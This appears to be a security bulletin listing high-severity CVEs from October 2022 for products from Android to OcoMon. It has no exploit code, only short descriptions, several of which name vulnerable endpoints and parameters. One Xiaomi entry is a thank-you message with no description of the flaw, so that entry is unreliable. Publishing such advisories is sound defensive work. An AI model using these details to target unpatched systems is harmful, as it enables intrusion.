google — android In CarSettings of app packages, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege in Bluetooth settings with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10 Android-11 Android-12 Android-12L. Android ID: A-220741473 2022-10-11 8.8 CVE-2022-20429
MISC
google — android In HTBLogKM of TBD, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-242345178 2022-10-14 7.8 CVE-2021-0699
MISC
google — android In DevmemIntHeapAcquire of TBD, there is a possible arbitrary code execution due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-242345085 2022-10-11 7.8 CVE-2021-0951
MISC
google — android In SitRilClient_OnResponse of SitRilSe.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-223086933. References: N/A 2022-10-14 7.8 CVE-2022-20397
MISC
google — android In handleFullScreenIntent of StatusBarNotificationActivityStarter.java, there is a possible bypass of the restriction of starting activity from background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10 Android-11 Android-12 Android-12L Android-13. Android ID: A-231322873 2022-10-11 7.8 CVE-2022-20415
MISC
google — android In audioTransportsToHal of HidlUtils.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-12 Android-12L Android-13. Android ID: A-237717857 2022-10-11 7.8 CVE-2022-20416
MISC
google — android In audioTransportsToHal of HidlUtils.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-12 Android-12L Android-13. Android ID: A-237288416 2022-10-11 7.8 CVE-2022-20417
MISC
google — android In setOptions of ActivityRecord.java, there is a possible way to load arbitrary Java code into the launcher process due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-12L Android-13. Android ID: A-237290578 2022-10-11 7.8 CVE-2022-20419
MISC
google — android In getBackgroundRestrictionExemptionReason of AppRestrictionController.java, there is a possible way to bypass device policy restrictions due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-13. Android ID: A-238377411 2022-10-11 7.8 CVE-2022-20420
MISC
google — android In binder_inc_ref_for_node of binder.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-239630375. References: Upstream kernel 2022-10-11 7.8 CVE-2022-20421
MISC
google — android There is a missing authorization issue in the system service. The component does not have a permission check, resulting in local elevation of privilege. Product: Android. Versions: Android SoC. Android ID: A-242221233 2022-10-11 7.8 CVE-2022-20430
MISC
google — android There is a missing authorization issue in the system service. The component does not have a permission check, resulting in local elevation of privilege. Product: Android. Versions: Android SoC. Android ID: A-242221238 2022-10-11 7.8 CVE-2022-20431
MISC
google — android There is a missing authorization issue in the system service. The component does not have a permission check and permission protection, resulting in local elevation of privilege. Product: Android. Versions: Android SoC. Android ID: A-242221899 2022-10-11 7.8 CVE-2022-20432
MISC
google — android There is a missing authorization issue in the system service. The component does not have a permission check, resulting in local elevation of privilege. Product: Android. Versions: Android SoC. Android ID: A-242221901 2022-10-11 7.8 CVE-2022-20433
MISC
google — android There is a missing authorization issue in the system service. The component does not have a permission check, resulting in local elevation of privilege. Product: Android. Versions: Android SoC. Android ID: A-242244028 2022-10-11 7.8 CVE-2022-20434
MISC
google — android There is an unauthorized service in the system service, which may cause the system to reboot. The component does not have a permission check and permission protection, resulting in an EoP problem. Product: Android. Versions: Android SoC. Android ID: A-242248367 2022-10-11 7.8 CVE-2022-20435
MISC
google — android There is an unauthorized service in the system service. The component does not have a permission check, resulting in local elevation of privilege. Product: Android. Versions: Android SoC. Android ID: A-242248369 2022-10-11 7.8 CVE-2022-20436
MISC
google — android In telephony, there is a possible escalation of privilege due to a parcel format mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07319121; Issue ID: ALPS07319121. 2022-10-07 7.8 CVE-2022-26471
MISC
google — android In ims, there is a possible escalation of privilege due to a parcel format mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07319095; Issue ID: ALPS07319095. 2022-10-07 7.8 CVE-2022-26472
MISC
google — android A heap-based overflow vulnerability in makeContactAGIF in libagifencoder.quram.so library prior to SMR Oct-2022 Release 1 allows attacker to perform code execution. 2022-10-07 7.8 CVE-2022-39852
MISC
google — android A use after free vulnerability in perf-mgr driver prior to SMR Oct-2022 Release 1 allows attacker to cause memory access fault. 2022-10-07 7.8 CVE-2022-39853
MISC
google — android In avrc_ctrl_pars_vendor_rsp of avrc_pars_ct.cc, there is a possible out of bounds read due to an integer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10 Android-11 Android-12 Android-12L Android-13. Android ID: A-205570663 2022-10-11 7.5 CVE-2022-20410
MISC
google — android In pickStartSeq of AAVCAssembler.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-12 Android-12L Android-13. Android ID: A-231986464 2022-10-11 7.5 CVE-2022-20418
MISC
google — android In Wi-Fi driver, there is a possible way to disconnect Wi-Fi due to an improper resource release. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07030600; Issue ID: ALPS07030600. 2022-10-07 7.5 CVE-2022-32589
MISC
google — android In ril, there is a possible system crash due to an incorrect bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07257259; Issue ID: ALPS07257259. 2022-10-07 7.5 CVE-2022-32591
MISC
google — android In dllist_remove_node of TBD, there is a possible use after free bug due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-242344778 2022-10-11 7 CVE-2021-0696
MISC
google — android In emulation_proc_handler of armv8_deprecated.c, there is a possible way to corrupt memory due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-237540956. References: Upstream kernel 2022-10-11 7 CVE-2022-20422
MISC
google — protobuf-java A parsing issue with binary data in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above. 2022-10-12 7.5 CVE-2022-3171
CONFIRM
gradle — enterprise An access-control vulnerability in Gradle Enterprise 2022.4 through 2022.3.1 allows remote attackers to prevent backups from occurring, and send emails with arbitrary text content to the configured installation-administrator contact address, via HTTP access to an accidentally exposed internal endpoint. This is fixed in 2022.3.2. 2022-10-07 7.5 CVE-2022-41574
MISC
MISC
grafana — grafana Grafana is an open source observability and data visualization platform. Versions prior to 9.1.8 and 8.5.14 are vulnerable to a bypass in the plugin signature verification. An attacker can convince a server admin to download and successfully run a malicious plugin even though unsigned plugins are not allowed. Versions 9.1.8 and 8.5.14 contain a patch for this issue. As a workaround, do not install plugins downloaded from untrusted sources. 2022-10-13 7.8 CVE-2022-31123
CONFIRM
MISC
grafana — grafana Grafana is an open source observability and data visualization platform. Versions of Grafana for endpoints prior to 9.1.8 and 8.5.14 could leak authentication tokens to some destination plugins under some conditions. The vulnerability impacts data source and plugin proxy endpoints with authentication tokens. The destination plugin could receive a user’s Grafana authentication token. Versions 9.1.8 and 8.5.14 contain a patch for this issue. As a workaround, do not use API keys, JWT authentication, or any HTTP Header based authentication. 2022-10-13 7.5 CVE-2022-31130
CONFIRM
MISC
MISC
MISC
grunt-karma_project — grunt-karma Prototype pollution vulnerability in karma-runner grunt-karma 4.0.1 via the key variable in grunt-karma.js. 2022-10-14 9.8 CVE-2022-37602
MISC
MISC
MISC
hancom — hancom_office_2020 A buffer underflow vulnerability exists in the way Hword of Hancom Office 2020 version 11.0.0.5357 parses XML-based office files. A specially-crafted malformed file can cause memory corruption by using memory before buffer start, which can lead to code execution. A victim would need to access a malicious file to trigger this vulnerability. 2022-10-07 7.8 CVE-2022-33896
MISC
hashicorp — packer An issue was discovered in Hashicorp Packer before 2.3.1. The recommended sudoers configuration for Vagrant on Linux is insecure. If the host has been configured according to this documentation, non-privileged users on the host can leverage a wildcard in the sudoers configuration to execute arbitrary commands as root. 2022-10-11 7.8 CVE-2022-42717
MISC
MISC
MISC
huawei — harmonyos The rphone module has a script that can be maliciously modified. Successful exploitation of this vulnerability may cause irreversible programs to be implanted on user devices. 2022-10-14 7.8 CVE-2022-41576
MISC
MISC
huawei — harmonyos The kernel server has a vulnerability of not verifying the length of the data transferred in the user space. Successful exploitation of this vulnerability may cause out-of-bounds read in the kernel, which affects the device confidentiality and availability. 2022-10-14 7.1 CVE-2022-41577
MISC
MISC
human_resource_management_system_project — human_resource_management_system A vulnerability has been found in SourceCodester Human Resource Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /employeeview.php of the component Image File Handler. The manipulation leads to unrestricted upload. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-210559. 2022-10-12 9.8 CVE-2022-3458
N/A
human_resource_management_system_project — human_resource_management_system A vulnerability classified as critical was found in SourceCodester Human Resource Management System 1.0. This vulnerability affects unknown code of the component Profile Photo Handler. The manipulation of the argument parameter leads to os command injection. The attack can be initiated remotely. The identifier of this vulnerability is VDB-210772. 2022-10-13 8.8 CVE-2022-3492
MISC
human_resource_management_system_project — human_resource_management_system A vulnerability was found in SourceCodester Human Resource Management System 1.0 and classified as critical. This issue affects some unknown processing of the file employeeadd.php of the component Admin Panel. The manipulation leads to improper access controls. The attack may be initiated remotely. The identifier VDB-210785 was assigned to this vulnerability. 2022-10-14 8.8 CVE-2022-3496
MISC
idreamsoft — icms iCMS v7.0.16 was discovered to contain a Server-Side Request Forgery (SSRF) via the url parameter at admincp.php. 2022-10-13 9.8 CVE-2022-41496
MISC
ikuai8 — ikuaios iKuai8 v3.6.7 was discovered to contain an authenticated remote code execution (RCE) vulnerability. 2022-10-12 8.8 CVE-2022-40469
MISC
MISC
MISC
ikus-soft — rdiffweb Allocation of Resources Without Limits or Throttling in GitHub repository ikus060/rdiffweb prior to 2.5.0. 2022-10-14 9.8 CVE-2022-3439
MISC
CONFIRM
ikus-soft — rdiffweb Allocation of Resources Without Limits or Throttling in GitHub repository ikus060/rdiffweb prior to 2.5.0. 2022-10-13 9.8 CVE-2022-3456
MISC
CONFIRM
ikus-soft — rdiffweb Origin Validation Error in GitHub repository ikus060/rdiffweb prior to 2.5.0a5. 2022-10-13 9.8 CVE-2022-3457
MISC
CONFIRM
ini4j_project — ini4j An issue in the fetch() method in the BasicProfile class of org.ini4j before v0.5.4 allows attackers to cause a Denial of Service (DoS) via unspecified vectors. 2022-10-11 7.5 CVE-2022-41404
MISC
interspire — email_marketer Interspire Email Marketer through 6.5.0 allows arbitrary file upload via a surveys_submit.php “create survey and submit survey” operation, which can cause a .php file to be accessible under a /admin/temp/surveys/ URI. NOTE: this issue exists because of an incomplete fix for CVE-2018-19550. 2022-10-11 8.8 CVE-2022-40777
MISC
MISC
isc — dhcp In ISC DHCP 4.4.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1, when the function option_code_hash_lookup() is called from add_option(), it increases the option’s refcount field. However, there is not a corresponding call to option_dereference() to decrement the refcount field. The function add_option() is only used in server responses to lease query packets. Each lease query response calls this function for several options, so eventually, the reference counters could overflow and cause the server to abort. 2022-10-07 7.5 CVE-2022-2928
CONFIRM
MLIST
FEDORA
jflyfox — jfinal_cms JFinal CMS 5.1.0 is vulnerable to SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection. 2022-10-13 8.8 CVE-2022-37208
MISC
MISC
jiusi — jiusi_oa A vulnerability classified as critical was found in Jiusi OA. Affected by this vulnerability is an unknown functionality of the file /jsoa/hntdCustomDesktopActionContent. The manipulation of the argument inforid leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-210709 was assigned to this vulnerability. 2022-10-12 9.8 CVE-2022-3467
MISC
MISC
js-beautify_project — js-beautify Prototype pollution vulnerability in beautify-web js-beautify 1.13.7 via the name variable in options.js. 2022-10-11 9.8 CVE-2022-37609
MISC
MISC
MISC
linaro — lava In Linaro Automated Validation Architecture (LAVA) before 2022.10, there is dynamic code execution in lava_server/lavatable.py. Due to improper input sanitization, an anonymous user can force the lava-server-gunicorn service to execute user-provided code on the server. 2022-10-13 8.8 CVE-2022-42902
MISC
MISC
linuxmint — warpinator Warpinator through 1.2.14 allows access outside of an intended directory, as demonstrated by symbolic directory links. 2022-10-10 7.5 CVE-2022-42725
MISC
MISC
MISC
MISC
mediabridgeproducts — mlwr-ac1200r_firmware A vulnerability classified as critical was found in Mediabridge Medialink. This vulnerability affects unknown code of the file /index.asp. The manipulation leads to improper authentication. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210700. 2022-10-12 9.8 CVE-2022-3465
N/A
N/A
melistechnology — melis-asset-manager MelisAssetManager provides deliveries of Melis Platform’s assets located in every module’s public folder. Attackers can read arbitrary files on affected versions of `melisplatform/melis-asset-manager`, leading to the disclosure of sensitive information. Conducting this attack does not require authentication. Users should immediately upgrade to `melisplatform/melis-asset-manager` >= 5.0.1. This issue was addressed by restricting access to files to intended directories only. 2022-10-11 7.5 CVE-2022-39296
CONFIRM
MISC
melistechnology — meliscms MelisCms provides a full CMS for Melis Platform, including templating system, drag’n’drop of plugins, SEO and many administration tools. Attackers can deserialize arbitrary data on affected versions of `melisplatform/melis-cms`, which ultimately leads to the execution of arbitrary PHP code on the system. Conducting this attack does not require authentication. Users should immediately upgrade to `melisplatform/melis-cms` >= 5.0.1. This issue was addressed by restricting allowed classes when deserializing user-controlled data. 2022-10-12 9.8 CVE-2022-39297
MISC
CONFIRM
melistechnology — meliscms MelisFront is the engine that displays websites hosted on Melis Platform. It deals with showing pages, plugins, URL rewriting, search optimization and SEO, etc. Attackers can deserialize arbitrary data on affected versions of `melisplatform/melis-front`, which ultimately leads to the execution of arbitrary PHP code on the system. Conducting this attack does not require authentication. Users should immediately upgrade to `melisplatform/melis-front` >= 5.0.1. This issue was addressed by restricting allowed classes when deserializing user-controlled data. 2022-10-12 9.8 CVE-2022-39298
MISC
CONFIRM
merchandise_online_store_project — merchandise_online_store A Vertical Privilege Escalation issue in Merchandise Online Store v.1.0 allows an attacker to get access to the admin dashboard. 2022-10-11 8.8 CVE-2022-42238
MISC
mi — xiaomi A logic vulnerability exists in a Xiaomi product. The vulnerability is caused by an identity verification failure, which can be exploited by an attacker who can obtain a brief elevation of privilege. 2022-10-11 9.8 CVE-2020-14129
MISC
mi — xiaomi The Xiaomi Security Center expresses heartfelt thanks to ADLab of VenusTech! At the same time, we also welcome more outstanding and professional security experts and security teams to join the Mi Security Center (MiSRC) to jointly ensure the safe access of millions of Xiaomi users worldwide Life. 2022-10-11 9.8 CVE-2020-14131
MISC
microsoft — .net_core NuGet Client Elevation of Privilege Vulnerability. 2022-10-11 7.8 CVE-2022-41032
MISC
microsoft — azure_rtos_usbx Azure RTOS USBx is a USB host, device, and on-the-go (OTG) embedded stack, fully integrated with Azure RTOS ThreadX and available for all Azure RTOS ThreadX–supported processors. Azure RTOS USBX implementation of host support for USB CDC ECM includes an integer underflow and a buffer overflow in the `_ux_host_class_cdc_ecm_mac_address_get` function which may be potentially exploited to achieve remote code execution or denial of service. Setting mac address string descriptor length to a `0` or `1` allows an attacker to introduce an integer underflow followed (string_length) by a buffer overflow of the `cdc_ecm -> ux_host_class_cdc_ecm_node_id` array. This may allow one to redirect the code execution flow or introduce a denial of service. The fix has been included in USBX release [6.1.12](https://github.com/azure-rtos/usbx/releases/tag/v6.1.12_rel). Improved mac address string descriptor length validation to check for unexpectedly small values may be used as a workaround. 2022-10-10 9.8 CVE-2022-36063
CONFIRM
MISC
MISC
microsoft — azure_stack_edge Azure Arc-enabled Kubernetes cluster Connect Elevation of Privilege Vulnerability. 2022-10-11 10 CVE-2022-37968
MISC
microsoft — jupyter Visual Studio Code Elevation of Privilege Vulnerability. 2022-10-11 7.8 CVE-2022-41083
MISC
microsoft — malware_protection_engine Microsoft Windows Defender Elevation of Privilege Vulnerability. 2022-10-11 7.1 CVE-2022-37971
MISC
microsoft — office Microsoft Office Remote Code Execution Vulnerability. 2022-10-11 7.8 CVE-2022-38048
MISC
microsoft — office Microsoft Office Graphics Remote Code Execution Vulnerability. 2022-10-11 7.8 CVE-2022-38049
MISC
microsoft — office Microsoft Word Remote Code Execution Vulnerability. 2022-10-11 7.8 CVE-2022-41031
MISC
microsoft — sharepoint_foundation Microsoft SharePoint Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-41036, CVE-2022-41037, CVE-2022-41038. 2022-10-11 8.8 CVE-2022-38053
MISC
microsoft — sharepoint_foundation Microsoft SharePoint Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-38053, CVE-2022-41037, CVE-2022-41038. 2022-10-11 8.8 CVE-2022-41036
MISC
microsoft — sharepoint_foundation Microsoft SharePoint Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-38053, CVE-2022-41036, CVE-2022-41038. 2022-10-11 8.8 CVE-2022-41037
MISC
microsoft — sharepoint_foundation Microsoft SharePoint Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-38053, CVE-2022-41036, CVE-2022-41037. 2022-10-11 8.8 CVE-2022-41038
MISC
microsoft — visual_studio_code Visual Studio Code Remote Code Execution Vulnerability. 2022-10-11 7.8 CVE-2022-41034
MISC
microsoft — visual_studio_code Visual Studio Code Information Disclosure Vulnerability. 2022-10-11 7.4 CVE-2022-41042
MISC
microsoft — windows_10 Windows Group Policy Elevation of Privilege Vulnerability. 2022-10-11 8.8 CVE-2022-37975
MISC
microsoft — windows_10 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-38031. 2022-10-11 8.8 CVE-2022-37982
MISC
microsoft — windows_10 Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability. 2022-10-11 8.8 CVE-2022-38016
MISC
microsoft — windows_10 Windows Local Session Manager (LSM) Denial of Service Vulnerability. This CVE ID is unique from CVE-2022-37998. 2022-10-11 8.6 CVE-2022-37973
MISC
microsoft — windows_10 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24504, CVE-2022-30198, CVE-2022-33634, CVE-2022-38000, CVE-2022-38047, CVE-2022-41081. 2022-10-11 8.1 CVE-2022-22035
MISC
microsoft — windows_10 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22035, CVE-2022-30198, CVE-2022-33634, CVE-2022-38000, CVE-2022-38047, CVE-2022-41081. 2022-10-11 8.1 CVE-2022-24504
MISC
microsoft — windows_10 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22035, CVE-2022-24504, CVE-2022-33634, CVE-2022-38000, CVE-2022-38047, CVE-2022-41081. 2022-10-11 8.1 CVE-2022-30198
MISC
microsoft — windows_10 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22035, CVE-2022-24504, CVE-2022-30198, CVE-2022-38000, CVE-2022-38047, CVE-2022-41081. 2022-10-11 8.1 CVE-2022-33634
MISC
microsoft — windows_10 Windows GDI+ Remote Code Execution Vulnerability. 2022-10-11 7.8 CVE-2022-33635
MISC
microsoft — windows_10 Windows Hyper-V Elevation of Privilege Vulnerability. 2022-10-11 7.8 CVE-2022-37979
MISC
microsoft — windows_10 Windows DHCP Client Elevation of Privilege Vulnerability. 2022-10-11 7.8 CVE-2022-37980
MISC
microsoft — windows_10 Windows WLAN Service Elevation of Privilege Vulnerability. 2022-10-11 7.8 CVE-2022-37984
MISC
microsoft — windows_10 Windows Win32k Elevation of Privilege Vulnerability. 2022-10-11 7.8 CVE-2022-37986
MISC
microsoft — windows_10 Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37988, CVE-2022-37990, CVE-2022-37991, CVE-2022-38022, CVE-2022-38037, CVE-2022-38038, CVE-2022-38039. 2022-10-11 7.8 CVE-2022-37995
MISC
microsoft — windows_10 Windows Resilient File System Elevation of Privilege. 2022-10-11 7.8 CVE-2022-38003
MISC
microsoft — windows_10 Windows Local Session Manager (LSM) Denial of Service Vulnerability. This CVE ID is unique from CVE-2022-37973. 2022-10-11 7.7 CVE-2022-37998
MISC
microsoft — windows_10 Windows TCP/IP Driver Denial of Service Vulnerability. 2022-10-11 7.5 CVE-2022-33645
MISC
microsoft — windows_10 Windows CryptoAPI Spoofing Vulnerability. 2022-10-11 7.5 CVE-2022-34689
MISC
microsoft — windows_10 Windows Active Directory Certificate Services Security Feature Bypass. 2022-10-11 7.5 CVE-2022-37978
MISC
microsoft — windows_server_2008 Active Directory Certificate Services Elevation of Privilege Vulnerability. 2022-10-11 8.8 CVE-2022-37976
MISC
microsoft — windows_server_2008 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-37982. 2022-10-11 8.8 CVE-2022-38031
MISC
microsoft — windows_server_2008 Windows Workstation Service Elevation of Privilege Vulnerability. 2022-10-11 8.8 CVE-2022-38034
MISC
microsoft — windows_server_2008 Microsoft ODBC Driver Remote Code Execution Vulnerability. 2022-10-11 8.8 CVE-2022-38040
MISC
microsoft — windows_server_2008 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22035, CVE-2022-24504, CVE-2022-30198, CVE-2022-33634, CVE-2022-38047, CVE-2022-41081. 2022-10-11 8.1 CVE-2022-38000
MISC
microsoft — windows_server_2008 Active Directory Domain Services Elevation of Privilege Vulnerability. 2022-10-11 8.1 CVE-2022-38042
MISC
microsoft — windows_server_2008 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22035, CVE-2022-24504, CVE-2022-30198, CVE-2022-33634, CVE-2022-38000, CVE-2022-41081. 2022-10-11 8.1 CVE-2022-38047
MISC
microsoft — windows_server_2008 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22035, CVE-2022-24504, CVE-2022-30198, CVE-2022-33634, CVE-2022-38000, CVE-2022-38047. 2022-10-11 8.1 CVE-2022-41081
MISC
microsoft — windows_server_2008 Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37989. 2022-10-11 7.8 CVE-2022-37987
MISC
microsoft — windows_server_2008 Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37990, CVE-2022-37991, CVE-2022-37995, CVE-2022-38022, CVE-2022-38037, CVE-2022-38038, CVE-2022-38039. 2022-10-11 7.8 CVE-2022-37988
MISC
microsoft — windows_server_2008 Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37987. 2022-10-11 7.8 CVE-2022-37989
MISC
microsoft — windows_server_2008 Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37988, CVE-2022-37991, CVE-2022-37995, CVE-2022-38022, CVE-2022-38037, CVE-2022-38038, CVE-2022-38039. 2022-10-11 7.8 CVE-2022-37990
MISC
microsoft — windows_server_2008 Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37988, CVE-2022-37990, CVE-2022-37995, CVE-2022-38022, CVE-2022-38037, CVE-2022-38038, CVE-2022-38039. 2022-10-11 7.8 CVE-2022-37991
MISC
microsoft — windows_server_2008 Windows Group Policy Preference Client Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37994, CVE-2022-37999. 2022-10-11 7.8 CVE-2022-37993
MISC
microsoft — windows_server_2008 Windows Group Policy Preference Client Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37993, CVE-2022-37999. 2022-10-11 7.8 CVE-2022-37994
MISC
microsoft — windows_server_2008 Windows Graphics Component Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-38051. 2022-10-11 7.8 CVE-2022-37997
MISC
microsoft — windows_server_2008 Windows Group Policy Preference Client Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37993, CVE-2022-37994. 2022-10-11 7.8 CVE-2022-37999
MISC
microsoft — windows_server_2008 Windows Print Spooler Elevation of Privilege Vulnerability. 2022-10-11 7.8 CVE-2022-38028
MISC
microsoft — windows_server_2008 Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37988, CVE-2022-37990, CVE-2022-37991, CVE-2022-37995, CVE-2022-38022, CVE-2022-38038, CVE-2022-38039. 2022-10-11 7.8 CVE-2022-38037
MISC
microsoft — windows_server_2008 Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37988, CVE-2022-37990, CVE-2022-37991, CVE-2022-37995, CVE-2022-38022, CVE-2022-38037, CVE-2022-38039. 2022-10-11 7.8 CVE-2022-38038
MISC
microsoft — windows_server_2008 Windows CD-ROM File System Driver Remote Code Execution Vulnerability. 2022-10-11 7.8 CVE-2022-38044
MISC
microsoft — windows_server_2008 Windows Graphics Component Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37997. 2022-10-11 7.8 CVE-2022-38051
MISC
microsoft — windows_server_2008 Windows COM+ Event System Service Elevation of Privilege Vulnerability. 2022-10-11 7.8 CVE-2022-41033
MISC
microsoft — windows_server_2008 Windows Secure Channel Denial of Service Vulnerability. 2022-10-11 7.5 CVE-2022-38041
MISC
microsoft — windows_server_2008 Windows Storage Elevation of Privilege Vulnerability. 2022-10-11 7 CVE-2022-38027
MISC
microsoft — windows_server_2008 Windows ALPC Elevation of Privilege Vulnerability. 2022-10-11 7 CVE-2022-38029
MISC
microsoft — windows_server_2012 Server Service Remote Protocol Elevation of Privilege Vulnerability. 2022-10-11 9.1 CVE-2022-38045
MISC
microsoft — windows_server_2012 Connected User Experiences and Telemetry Elevation of Privilege Vulnerability. 2022-10-11 7 CVE-2022-38021
MISC
microsoft — windows_server_2019 Windows DWM Core Library Elevation of Privilege Vulnerability. 2022-10-11 7.8 CVE-2022-37970
MISC
microsoft — windows_server_2019 Microsoft DWM Core Library Elevation of Privilege Vulnerability. 2022-10-11 7.8 CVE-2022-37983
MISC
microsoft — windows_server_2019 Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37988, CVE-2022-37990, CVE-2022-37991, CVE-2022-37995, CVE-2022-38022, CVE-2022-38037, CVE-2022-38038. 2022-10-11 7.8 CVE-2022-38039
MISC
microsoft — windows_server_2019 Win32k Elevation of Privilege Vulnerability. 2022-10-11 7.8 CVE-2022-38050
MISC
microsoft — windows_server_2019 Web Account Manager Information Disclosure Vulnerability. 2022-10-11 7.5 CVE-2022-38046
MISC
microsoft — windows_server_2022 Internet Key Exchange (IKE) Protocol Denial of Service Vulnerability. 2022-10-11 7.5 CVE-2022-38036
MISC
mockery_project — mockery Prototype pollution vulnerability in function enable in mockery.js in mfncooper mockery commit 822f0566fd6d72af8c943ae5ca2aa92e516aa2cf via the key variable in mockery.js. 2022-10-12 9.8 CVE-2022-37614
MISC
MISC
MISC
newsletter_subscribe_(popup_+_regular_module)_project — newsletter_subscribe_(popup_+_regular_module) OpenCart 3.x Newsletter Custom Popup was discovered to contain a SQL injection vulnerability via the email parameter at index.php?route=extension/module/so_newletter_custom_popup/newsletter. 2022-10-12 9.8 CVE-2022-41403
MISC
node_saml_project — node_saml node SAML is a SAML 2.0 library based on the SAML implementation of passport-saml. A remote attacker may be able to bypass SAML authentication on a website using passport-saml. A successful attack requires that the attacker is in possession of an arbitrary IDP signed XML element. Depending on the IDP used, fully unauthenticated attacks (e.g. without access to a valid user) might also be feasible if generation of a signed message can be triggered. Users should upgrade to node-saml version 4.0.0-beta5 or newer. Disabling SAML authentication may be done as a workaround. 2022-10-13 8.1 CVE-2022-39300
MISC
CONFIRM
nokia — airframe_bmc_web_gui_r18_firmware Multiple Improper Access Control was discovered in Nokia AirFrame BMC Web GUI < R18 Firmware v4.13.00. It does not properly validate requests for access to (or editing of) data and functionality in all endpoints under /#settings/* and /api/settings/*. By not verifying the permissions for access to resources, it allows a potential attacker to view pages, with sensitive data, that are not allowed, and modify system configurations also causing DoS, which should be accessed only by user with administration profile, bypassing all controls (without checking for user identity). 2022-10-12 8.8 CVE-2022-28866
MISC
MISC
ocomon_project — ocomon OcoMon v4.0 was discovered to contain a SQL injection vulnerability via the cod parameter at download.php. 2022-10-13 9.8 CVE-2022-41390
MISC
ocomon_project — ocomon OcoMon v4.0 was discovered to contain a SQL injection vulnerability via the cod parameter at showImg.php. 2022-10-13 9.8 CVE-2022-41391
MISC
